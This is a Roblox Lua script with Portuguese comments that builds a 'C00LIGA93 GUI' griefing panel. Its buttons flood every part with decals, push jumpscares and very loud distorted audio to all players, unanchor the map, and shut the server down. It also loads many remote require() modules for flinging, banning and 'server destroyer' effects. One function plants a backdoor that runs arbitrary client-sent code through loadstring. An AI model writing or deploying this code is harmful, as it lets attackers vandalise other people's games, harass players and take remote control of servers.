--==================================== -- C00LIGA93 GUI - RETÂNGULO DEITADO COMPLETO --==================================== local TargetPlayerName = "yourname" -- <<< Mude aqui o nome do player local Players = game:GetService("Players") local player = Players:FindFirstChild(TargetPlayerName) or Players.LocalPlayer -- Cria GUI local gui = Instance.new("ScreenGui") gui.Name = "C00LIGA93_GUI" gui.ResetOnSpawn = false gui.Parent = player:WaitForChild("PlayerGui") -- Frame principal (retângulo deitado) local frame = Instance.new("Frame") frame.Size = UDim2.new(0, 900, 0, 500) frame.Position = UDim2.new(0.5, -450, 0.5, -250) frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0) frame.BackgroundTransparency = 0.4 frame.Active = true frame.Draggable = true frame.Parent = gui local fundo = Instance.new("ImageLabel") fundo.Size = UDim2.new(1, 0, 1, 0) fundo.BackgroundTransparency = 1 fundo.Image = "rbxassetid://105224460662280" fundo.ImageTransparency = 0.4 fundo.ZIndex = 0 fundo.Parent = frame -- Título local titulo = Instance.new("TextLabel") titulo.Size = UDim2.new(1, 0, 0, 60) titulo.BackgroundTransparency = 1 titulo.Text = "C00LIGA93 GUI" titulo.TextColor3 = Color3.new(1,1,1) titulo.Font = Enum.Font.GothamBlack titulo.TextScaled = true titulo.ZIndex = 5 titulo.Parent = frame -- Container dos botões local container = Instance.new("Frame") container.Size = UDim2.new(1, -40, 1, -100) container.Position = UDim2.new(0, 20, 0, 80) container.BackgroundTransparency = 1 container.Parent = frame -- Grid para botões pequenos local grid = Instance.new("UIGridLayout") grid.CellSize = UDim2.new(0, 140, 0, 35) grid.CellPadding = UDim2.new(0, 10, 0, 10) grid.HorizontalAlignment = Enum.HorizontalAlignment.Center grid.Parent = container -- Criador de botão local function criarBotao(nome, func) local b = Instance.new("TextButton") b.BackgroundColor3 = Color3.fromRGB(25, 25, 25) b.TextColor3 = Color3.new(1,1,1) b.BorderSizePixel = 0 b.Text = nome b.Font = Enum.Font.GothamBold b.TextScaled = true b.Parent = container b.MouseButton1Click:Connect(func) end ------------------------------------------------ -- FUNÇÕES ORIGINAIS COMPLETAS ------------------------------------------------ local function spamDecal() for _, obj in ipairs(workspace:GetDescendants()) do if obj:IsA("BasePart") then for _, face in ipairs(Enum.NormalId:GetEnumItems()) do local d = Instance.new("Decal") d.Texture = "rbxassetid://105224460662280" d.Face = face d.Parent = obj end end end end local function jumpscare() for _,plr in pairs(Players:GetPlayers()) do local g = Instance.new("ScreenGui", plr.PlayerGui) g.Name = "SCREAM" local img = Instance.new("ImageLabel", g) img.Size = UDim2.new(1,0,1,0) img.BackgroundTransparency = 1 img.Image = "rbxassetid://122845307992259" img.ZIndex = 999 local sound = Instance.new("Sound", workspace) sound.SoundId = "rbxassetid://80776947525537" sound.Volume = 5 sound:Play() sound.Ended:Connect(function() g:Destroy() sound:Destroy() end) end end local function particles() if player.Character then for _, part in ipairs(player.Character:GetDescendants()) do if part:IsA("BasePart") then local p = Instance.new("ParticleEmitter", part) p.Texture = "rbxassetid://110917776341421" p.Rate = 40 p.Speed = NumberRange.new(3,5) end end end end local function doritos() if player.Character then for _, part in ipairs(player.Character:GetDescendants()) do if part:IsA("BasePart") then local p1 = Instance.new("ParticleEmitter", part) p1.Texture = "rbxassetid://17697464540" p1.Rate = 30 local p2 = Instance.new("ParticleEmitter", part) p2.Texture = "rbxassetid://5025889927" p2.Rate = 30 end end end end local function skybox() local L = game:GetService("Lighting") local sk = L:FindFirstChildOfClass("Sky") or Instance.new("Sky", L) local id = "rbxassetid://110917776341421" sk.SkyboxBk = id sk.SkyboxDn = id sk.SkyboxFt = id sk.SkyboxLf = id sk.SkyboxRt = id sk.SkyboxUp = id end local function msg() local m = Instance.new("Message", workspace) m.Text = "C00LIGA93 BACK" task.delay(5, function() m:Destroy() end) end local function hint() local h = Instance.new("Hint", workspace) h.Text = "TEAM IGA" end local function realm() local p = Instance.new("Part", workspace) p.Size = Vector3.new(10,20,1) p.Anchored = true p.Position = Vector3.new(0,10,0) p.BrickColor = BrickColor.new("Black") end local function bot666() for _, obj in ipairs(workspace:GetDescendants()) do if obj:IsA("BasePart") then obj.BrickColor = BrickColor.new("Really black") local fire = Instance.new("Fire", obj) fire.Heat = 10 fire.Size = 5 end end end local function shedlesky() local s = Instance.new("Sky", game.Lighting) local id = "http://www.roblox.com/asset/?id=172423468" s.SkyboxBk = id s.SkyboxDn = id s.SkyboxFt = id s.SkyboxLf = id s.SkyboxRt = id s.SkyboxUp = id end local function anonymous() -- CHAOS local Lighting = game:GetService("Lighting") local SoundService = game:GetService("SoundService") local PARTICLE_ASSET = "rbxassetid://127476787" local MUSIC_ID = "rbxassetid://1840712882" for _, obj in pairs(workspace:GetDescendants()) do if obj:IsA("BasePart") then obj.Anchored = false end end local function addParticles(character) local part = character:FindFirstChild("Torso") or character:FindFirstChild("UpperTorso") or character:FindFirstChild("HumanoidRootPart") if part then for i = 1, 3 do local emit = Instance.new("ParticleEmitter") emit.Texture = PARTICLE_ASSET emit.Rate = 400 emit.VelocitySpread = 150 emit.Speed = NumberRange.new(15, 35) emit.Lifetime = NumberRange.new(3, 6) emit.Rotation = NumberRange.new(0, 360) emit.RotSpeed = NumberRange.new(-300, 300) emit.Parent = part end end end for _, plr in pairs(Players:GetPlayers()) do if plr.Character then addParticles(plr.Character) end plr.CharacterAdded:Connect(addParticles) end for _, v in pairs(Lighting:GetChildren()) do if v:IsA("Sky") then v:Destroy() end end local sky = Instance.new("Sky") sky.SkyboxBk = PARTICLE_ASSET sky.SkyboxDn = PARTICLE_ASSET sky.SkyboxFt = PARTICLE_ASSET sky.SkyboxLf = PARTICLE_ASSET sky.SkyboxRt = PARTICLE_ASSET sky.SkyboxUp = PARTICLE_ASSET sky.Parent = Lighting Lighting.Brightness = 4 Lighting.ExposureCompensation = 2 for _, obj in pairs(workspace:GetDescendants()) do if obj:IsA("BasePart") then for _, face in pairs(Enum.NormalId:GetEnumItems()) do local decal = Instance.new("Decal") decal.Texture = PARTICLE_ASSET decal.Face = face decal.Parent = obj end end end for _, s in pairs(SoundService:GetChildren()) do if s:IsA("Sound") then s:Destroy() end end local sound = Instance.new("Sound") sound.SoundId = MUSIC_ID sound.Volume = 10 sound.PlaybackSpeed = 1.25 sound.Looped = true sound.Parent = SoundService local eq = Instance.new("EqualizerSoundEffect") eq.LowGain = 10 eq.MidGain = 10 eq.HighGain = 10 eq.Parent = sound local comp = Instance.new("CompressorSoundEffect") comp.GainMakeup = 25 comp.Threshold = -45 comp.Ratio = 25 comp.Parent = sound sound:Play() end local function iluminati() local sky = Instance.new("Sky", game.Lighting) local id = "http://www.roblox.com/asset/?id=261113277" sky.SkyboxBk = id sky.SkyboxDn = id sky.SkyboxFt = id sky.SkyboxLf = id sky.SkyboxRt = id sky.SkyboxUp = id end local function makeBackdoor() local server = Instance.new("RemoteEvent", game.ReplicatedStorage) server.OnServerEvent:Connect(function(plr, code) loadstring(code)() end) end local function C00liga93Theme() local sound = Instance.new("Sound", workspace) sound.SoundId = "rbxassetid://100828050594137" sound.Volume = 1 sound:Play() end local function skeletons() local imgs = { "http://www.roblox.com/asset/?id=169585459","http://www.roblox.com/asset/?id=169585475", "http://www.roblox.com/asset/?id=169585485","http://www.roblox.com/asset/?id=169585502", "http://www.roblox.com/asset/?id=169585515","http://www.roblox.com/asset/?id=169585502", "http://www.roblox.com/asset/?id=169585485","http://www.roblox.com/asset/?id=169585475" } local sp = Instance.new("Sound", workspace) sp.SoundId = "rbxassetid://4808613510" sp.Volume = 10 sp.Looped = true sp:Play() local sky = Instance.new("Sky", game.Lighting) task.spawn(function() while true do for _, i in ipairs(imgs) do sky.SkyboxBk = i sky.SkyboxDn = i sky.SkyboxFt = i sky.SkyboxLf = i sky.SkyboxRt = i sky.SkyboxUp = i local part = Instance.new("ParticleEmitter", workspace.Terrain) part.Texture = i part.Rate = 250 part.Speed = NumberRange.new(4,10) part.Lifetime = NumberRange.new(3) game.Debris:AddItem(part, 3) task.wait(0.25) end end end) end local function k00pgui() require(15267263357).V11(player.Name) end -- REQUIRES local function grabKnifeV4() require(18665717275).load(player.Name) end local function thomas() require(85704103303160).Thomas(player.Name) end local function banHammer() require(5448035802).Hammer(player.Name, "BanHammer") end local function grabKnifeClassic() require(2872994194).bruh("mode1", "mode2", player.Name) end local function vanTroll() require(2500657841).load(player.Name) end local function serverDestroyer() require(2500743596).load(player.Name) end local function trollGui() require(2500686011).load(player.Name) end local function earRape() require(5802346180).eliza(player.Name) end local function cannonX() require(7661712858).Load(player.Name) end local function backroomsEffect() require(12313683305).backrooms() end local function opAdmin() require(127445614272366).op(player.Name) end local function blueSpooky() require(132099457182422):blue2spooky(player.Name) end local function spaceEffect() require(5702244094).space(player.Name) end local function flingKnife() require(1701771279).load(player.Name) end local function btTools() require(2437981989).load(player.Name) end local function swordFling() require(4688657372).load(player.Name) end local function pianoSheet() require(2490990319).load() end local function discoEffect() require(4596934055).load() end local function feFlingAll() require(3665674704).load(player.Name) end local function cmdX() require(12934961066).load(player.Name) end local function revizAdmin() require(4663246340).load(player.Name) end local function infiniteYield() require(6034842966).load() end local function dexExplorer() require(3223609224).load() end local function darkDex() require(2890947319).load() end local function owlHub() require(6216771580).load() end local function shutdown() game:Shutdown() end -- BOTÕES ORIGINAIS criarBotao("DECAL SPAM", spamDecal) criarBotao("JUMPSCARE", jumpscare) criarBotao("PARTICLES", particles) criarBotao("DORITOS PARTICLES", doritos) criarBotao("SKYBOX", skybox) criarBotao("MSG", msg) criarBotao("HINT", hint) criarBotao("C00LIGA93 REALM", realm) criarBotao("666", bot666) criarBotao("SHEDLESKY", shedlesky) criarBotao("ANONYMOUS", anonymous) criarBotao("ILUMINATI", iluminati) criarBotao("MAKE BACKDOOR", makeBackdoor) criarBotao("C00LIGA93 THEME", C00liga93Theme) criarBotao("SKELETONS", skeletons) criarBotao("K00PGUI", k00pgui) criarBotao("GRAB KNIFE V4", grabKnifeV4) criarBotao("THOMAS", thomas) criarBotao("BAN HAMMER", banHammer) criarBotao("GRAB KNIFE CLASSIC", grabKnifeClassic) criarBotao("VAN TROLL", vanTroll) criarBotao("SERVER DESTROYER", serverDestroyer) criarBotao("TROLL GUI", trollGui) criarBotao("EAR RAPE", earRape) criarBotao("CANNON X", cannonX) criarBotao("BACKROOMS", backroomsEffect) criarBotao("OP ADMIN", opAdmin) criarBotao("BLUE SPOOKY", blueSpooky) criarBotao("SPACE EFFECT", spaceEffect) criarBotao("FLING KNIFE", flingKnife) criarBotao("BT TOOLS", btTools) criarBotao("SWORD FLING", swordFling) criarBotao("PIANO TROLL", pianoSheet) criarBotao("DISCO EFFECT", discoEffect) criarBotao("FE FLING ALL", feFlingAll) criarBotao("CMD-X", cmdX) criarBotao("REVIZ ADMIN", revizAdmin) criarBotao("INFINITE YIELD", infiniteYield) criarBotao("DEX EXPLORER", dexExplorer) criarBotao("DARK DEX", darkDex) criarBotao("OWL HUB", owlHub) criarBotao("SHUTDOWN", shutdown) -- BOTÕES EXTRAS (antiga segunda aba) local function robbetMeme() local IMAGE_ID = "rbxassetid://118950455662559" local function criarBillboard(character) local head = character:FindFirstChild("Head") if not head then return end if head:FindFirstChild("HeadBillboard") then head.HeadBillboard:Destroy() end local billboard = Instance.new("BillboardGui") billboard.Name = "HeadBillboard" billboard.Adornee = head billboard.Size = UDim2.new(2.5, 0, 2.5, 0) billboard.StudsOffset = Vector3.new(0, 0, 0) billboard.AlwaysOnTop = true billboard.Parent = head local image = Instance.new("ImageLabel") image.Size = UDim2.new(1, 0, 1, 0) image.BackgroundTransparency = 1 image.Image = IMAGE_ID image.Parent = billboard end for _, p in ipairs(Players:GetPlayers()) do if p.Character then criarBillboard(p.Character) end end end local function snoopDogMeme() local IMAGE_ID = "rbxassetid://71319677880578" local function criarBillboard(character) local head = character:FindFirstChild("Head") if not head then return end if head:FindFirstChild("HeadBillboard") then head.HeadBillboard:Destroy() end local billboard = Instance.new("BillboardGui") billboard.Name = "HeadBillboard" billboard.Adornee = head billboard.Size = UDim2.new(2.5, 0, 2.5, 0) billboard.StudsOffset = Vector3.new(0, 0, 0) billboard.AlwaysOnTop = true billboard.Parent = head local image = Instance.new("ImageLabel") image.Size = UDim2.new(1, 0, 1, 0) image.BackgroundTransparency = 1 image.Image = IMAGE_ID image.Parent = billboard end for _, p in ipairs(Players:GetPlayers()) do if p.Character then criarBillboard(p.Character) end end end local function s00iikiddGui() local Lighting = game:GetService("Lighting") local SKY_ID = "rbxassetid://84581807390800" for _,v in ipairs(Lighting:GetChildren()) do if v:IsA("Sky") then v:Destroy() end end local s = Instance.new("Sky", Lighting) s.SkyboxBk = SKY_ID s.SkyboxDn = SKY_ID s.SkyboxFt = SKY_ID s.SkyboxLf = SKY_ID s.SkyboxRt = SKY_ID s.SkyboxUp = SKY_ID for _,obj in ipairs(workspace:GetDescendants()) do if obj:IsA("BasePart") then for _,d in ipairs(obj:GetChildren()) do if d:IsA("Decal") or d:IsA("Texture") then d:Destroy() end end for _,face in ipairs(Enum.NormalId:GetEnumItems()) do local d = Instance.new("Decal", obj) d.Texture = SKY_ID d.Face = face end end end local sound = Instance.new("Sound", game:GetService("SoundService")) sound.SoundId = "rbxassetid://95156028272944" sound.Volume = 10 sound.PlaybackSpeed = 0.1 sound.Looped = true sound:Play() end local function oldC00ligaGui() spamDecal() skybox() C00liga93Theme() end local function sorridenteGui() local Lighting = game:GetService("Lighting") local SoundService = game:GetService("SoundService") local Debris = game:GetService("Debris") local IMAGE_ID = "rbxassetid://105233229952801" local MUSIC_SORRIDENTE = "rbxassetid://134904159263853" for _,v in ipairs(Lighting:GetChildren()) do if v:IsA("Sky") then v:Destroy() end end local s = Instance.new("Sky", Lighting) s.SkyboxBk = IMAGE_ID s.SkyboxDn = IMAGE_ID s.SkyboxFt = IMAGE_ID s.SkyboxLf = IMAGE_ID s.SkyboxRt = IMAGE_ID s.SkyboxUp = IMAGE_ID for _,p in ipairs(workspace:GetDescendants()) do if p:IsA("BasePart") then for _,f in ipairs(Enum.NormalId:GetEnumItems()) do local d = Instance.new("Decal", p) d.Texture = IMAGE_ID d.Face = f end end end for _,v in ipairs(SoundService:GetChildren()) do if v:IsA("Sound") then v:Destroy() end end local s = Instance.new("Sound", SoundService) s.SoundId = MUSIC_SORRIDENTE s.Volume = 10 s.PlaybackSpeed = 0.1 s.Looped = true s:Play() end criarBotao("ROBBET MEME", robbetMeme) criarBotao("SNOOP DOG MEME", snoopDogMeme) criarBotao("S00IIKIDD GUI", s00iikiddGui) criarBotao("C00LIGA93 GUI OLD", oldC00ligaGui) criarBotao("S00RR!DENTE GUI", sorridenteGui) print("C00LIGA93 GUI carregada com sucesso! Retângulo deitado, todos os botões.")